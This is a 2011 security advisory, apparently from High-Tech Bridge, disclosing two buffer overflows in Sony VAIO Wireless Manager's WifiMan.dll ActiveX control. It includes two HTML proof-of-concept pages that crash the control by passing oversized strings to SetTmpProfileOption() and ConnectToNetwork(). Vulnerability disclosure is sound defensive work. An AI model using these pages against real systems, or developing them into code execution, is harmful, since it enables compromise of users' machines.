High-Tech Bridge HTB23063
Dec 07, 2011 - 12:00 a.m.

2 Buffer Overflows in Wireless Manager Sony VAIO

www.htbridge.com

EPSS: 0.242 (percentile 96.6%)

High-Tech Bridge SA Security Research Lab has discovered 2 buffer overflow vulnerabilities in Wireless Manager Sony VAIO which can be exploited to execute arbitrary code on a vulnerable system.

  1. Buffer Overflow in Wireless Manager Sony VAIO: CVE-2012-0985

1.1 The method SetTmpProfileOption() in the WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(8212, "X")
arg3="defaultV"
ctrl.SetTmpProfileOption arg1 ,arg2 ,arg3
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>

1.2 The method ConnectToNetwork() in the WifiMan.dll library does not properly check the length of string parameters.
An attacker could craft a malicious HTML page to trigger the vulnerability and execute arbitrary code in the context of the affected user.
The following PoC will crash the application:
<HTML>
<BODY>
<object id=ctrl
classid="clsid:{92E7DDED-BBFE-4DDF-B717-074E3B602D1B}"></object>
<SCRIPT>
function Do_()
{
arg1=1
arg2=String(6164, "X")
ctrl.ConnectToNetwork arg1 ,arg2
}
</SCRIPT>
<input language=JavaScript onclick=Do_() type=button value="Sony_POC">
</BODY>
</HTML>